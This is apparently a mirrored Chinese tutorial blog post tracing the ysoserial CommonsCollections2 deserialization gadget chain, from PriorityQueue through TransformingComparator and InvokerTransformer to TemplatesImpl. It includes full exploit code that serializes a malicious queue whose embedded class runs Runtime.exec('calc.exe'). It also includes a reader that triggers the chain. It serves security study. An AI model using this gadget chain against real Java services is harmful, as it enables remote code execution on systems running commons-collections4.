java反序列化-ysoserial-调试分析总结篇(2)

2023-12-25 16:48

本文主要是介绍java反序列化-ysoserial-调试分析总结篇(2),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言:

不格小说网 https://m.vbuge.com

这篇主要分析commonCollections2,调用链如下图所示:

调用链分析:

分析环境:jdk1.8.0

 反序列化的入口点为src.zip!/java/util/PriorityQueue.java

 此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类

 接下来调用siftDownUsingConparator函数

 在这里将调用TransformingComparator的compare函数,在这里就到了新的漏洞触发点,this.transformer.transform(),而这里的this.transformer即为invokerTransformer,

在commoncollections1中第一次调用的是Lazymap的this.factory.transform,而这里是priorityQueue.java的compare里的this.transformer.transform

 

 而invokeTransformer中将反射调用,templatesImple的newTranformer方法,以前分析fastjson1.2.24时候也用的是这个内置的TemplatesImple类,其有getoutputProperties也将调用newTransformer()

接着套路思路就是在newTransformer中实例化我们的恶意字节码中包含的类,从而调用其static代码块或者构造方法中的rce代码

 

 ysoserial-exp构造

分析完调用链以后看看ysoserial是如何构造payload的

 首先创建TemplatesImpl实例

 Class.forName加载三个需要用到的类,然后调用重载的TemplatesImpl来创建实例,这里用到的技术是javassist操作类的字节码

接下来要对我们_bytecode字段所要存储的恶意字节码类进行操作,这里首先将两个类放到pool中

 其中SubTransletpaylod就是存放rce代码的类

 接下来从pool中取出要操作的类,来操作其字节码

 接下来该类创建static代码块,并且加入rce的代码,这里的代码可以自定义,读写文件也可以

 然后给该类重新设置名字,其实这个可以省略,接下来给该类设置父类为tranlet,其实这里也可以不设置,payload类里已经设置好了

 之后将rce类的字节码放到_bytecodes属性中,再设置其他依赖属性_name和_tfactory即可返回templatesImpl类

 接着定义需要反射调用的方法,这里首先用tostring进行填充,后面再放入newtransformer,声明要反序列化的队列priorityQueue,容量为2

然后反射设置invoketransformer的方法为newtransformer来替换原来的tostring,然后再将queue中的两个元素替换成templatesImpl类的实例,从而结束整个构造过程,因此构造分为三步

1.构造用于执行rce的类

2.构造templatesImpl类的实例,将1中的类填充

3.将2中的类填充到priorityqueue队列中,返回obj

手动编写exp:

exp.java

package CommonCollections2;import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;
import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;public class exp {public static void main(String[] args) throws ClassNotFoundException, NotFoundException, IOException, CannotCompileException, NoSuchFieldException, IllegalAccessException {TemplatesImpl tmp = new TemplatesImpl();ClassPool pool = ClassPool.getDefault();pool.insertClassPath(new ClassClassPath(payload.class));CtClass clazz = pool.get(payload.class.getName());final byte[] clazzByte = clazz.toBytecode();//_bytecode为private,需要设置可访问Field _btcode = TemplatesImpl.class.getDeclaredField("_bytecodes");_btcode.setAccessible(true);_btcode.set(tmp,new byte[][]{clazzByte});//_name不为空即可Field _name = TemplatesImpl.class.getDeclaredField("_name");_name.setAccessible(true);_name.set(tmp,"tr1ple");//_tfactory可为空Field _tf = TemplatesImpl.class.getDeclaredField("_tfactory");_tf.setAccessible(true);_tf.set(tmp,null);////构造priorityqueue对象//
        PriorityQueue queue = new PriorityQueue(2);queue.add(1);queue.add(1);InvokerTransformer trans = new InvokerTransformer("newTransformer",new Class[0],new Object[0]);//InvokerTransformer trans = new InvokerTransformer("getOutputProperties",new Class[0],new Object[0]); //调用该方法一样的效果//依赖collections4TransformingComparator com = new TransformingComparator(trans);Field ComFi = PriorityQueue.class.getDeclaredField("comparator");ComFi.setAccessible(true);ComFi.set(queue,com);Field qu = PriorityQueue.class.getDeclaredField("queue");qu.setAccessible(true);Object[] objOutput = (Object[])qu.get(queue);objOutput[0] = tmp;objOutput[1] = 1;//序列化
        File file;file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser");OutputStream out = new FileOutputStream(file);ObjectOutputStream obj = new ObjectOutputStream(out);obj.writeObject(queue);obj.close();}
}

 

payload.java

package CommonCollections2;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;
import java.io.Serializable;public class payload extends AbstractTranslet  implements Serializable {{try {Runtime.getRuntime().exec("calc.exe");} catch (IOException e) {e.printStackTrace();}}public payload(){System.out.println("tr1ple 2333");}public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}

readObj.java

package CommonCollections2;import java.io.*;public class readObj {public static void main(String[] args) {try {FileInputStream fio = new FileInputStream(new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser"));ObjectInputStream obj = new ObjectInputStream(fio);obj.readObject();obj.close();} catch (FileNotFoundException e) {e.printStackTrace();} catch (IOException e) {e.printStackTrace();} catch (ClassNotFoundException e) {e.printStackTrace();}}
}

测试结果:

如下图所示,_bytecode中的类将被实例化,调用static代码块的代码和构造函数中的代码

总结:

整个调用链的重点是在对队列元素排序时可以自定义比较器进行转换从而触发反射调用队列元素的成员方法,相对于cc1来说构造感觉更精巧一点,这个内部TemplatesImpl类也是jdk内置的,攻击效果也不受到jdk版本影响,只要cc4.0的依赖存在即可

 

这篇关于java反序列化-ysoserial-调试分析总结篇(2)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/536216

相关文章

HarmonyOS学习(七)——UI(五)常用布局总结

自适应布局 1.1、线性布局(LinearLayout) 通过线性容器Row和Column实现线性布局。Column容器内的子组件按照垂直方向排列,Row组件中的子组件按照水平方向排列。 属性说明space通过space参数设置主轴上子组件的间距,达到各子组件在排列上的等间距效果alignItems设置子组件在交叉轴上的对齐方式,且在各类尺寸屏幕上表现一致,其中交叉轴为垂直时,取值为Vert

JVM 的类初始化机制

前言 当你在 Java 程序中new对象时,有没有考虑过 JVM 是如何把静态的字节码(byte code)转化为运行时对象的呢,这个问题看似简单,但清楚的同学相信也不会太多,这篇文章首先介绍 JVM 类初始化的机制,然后给出几个易出错的实例来分析,帮助大家更好理解这个知识点。 JVM 将字节码转化为运行时对象分为三个阶段,分别是:loading 、Linking、initialization

Spring Security 基于表达式的权限控制

前言 spring security 3.0已经可以使用spring el表达式来控制授权,允许在表达式中使用复杂的布尔逻辑来控制访问的权限。 常见的表达式 Spring Security可用表达式对象的基类是SecurityExpressionRoot。 表达式描述hasRole([role])用户拥有制定的角色时返回true (Spring security默认会带有ROLE_前缀),去

浅析Spring Security认证过程

类图 为了方便理解Spring Security认证流程,特意画了如下的类图,包含相关的核心认证类 概述 核心验证器 AuthenticationManager 该对象提供了认证方法的入口,接收一个Authentiaton对象作为参数; public interface AuthenticationManager {Authentication authenticate(Authenti

Spring Security--Architecture Overview

1 核心组件 这一节主要介绍一些在Spring Security中常见且核心的Java类,它们之间的依赖,构建起了整个框架。想要理解整个架构,最起码得对这些类眼熟。 1.1 SecurityContextHolder SecurityContextHolder用于存储安全上下文(security context)的信息。当前操作的用户是谁,该用户是否已经被认证,他拥有哪些角色权限…这些都被保

Spring Security基于数据库验证流程详解

Spring Security 校验流程图 相关解释说明(认真看哦) AbstractAuthenticationProcessingFilter 抽象类 /*** 调用 #requiresAuthentication(HttpServletRequest, HttpServletResponse) 决定是否需要进行验证操作。* 如果需要验证,则会调用 #attemptAuthentica

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

Java架构师知识体认识

源码分析 常用设计模式 Proxy代理模式Factory工厂模式Singleton单例模式Delegate委派模式Strategy策略模式Prototype原型模式Template模板模式 Spring5 beans 接口实例化代理Bean操作 Context Ioc容器设计原理及高级特性Aop设计原理Factorybean与Beanfactory Transaction 声明式事物

Java进阶13讲__第12讲_1/2

多线程、线程池 1.  线程概念 1.1  什么是线程 1.2  线程的好处 2.   创建线程的三种方式 注意事项 2.1  继承Thread类 2.1.1 认识  2.1.2  编码实现  package cn.hdc.oop10.Thread;import org.slf4j.Logger;import org.slf4j.LoggerFactory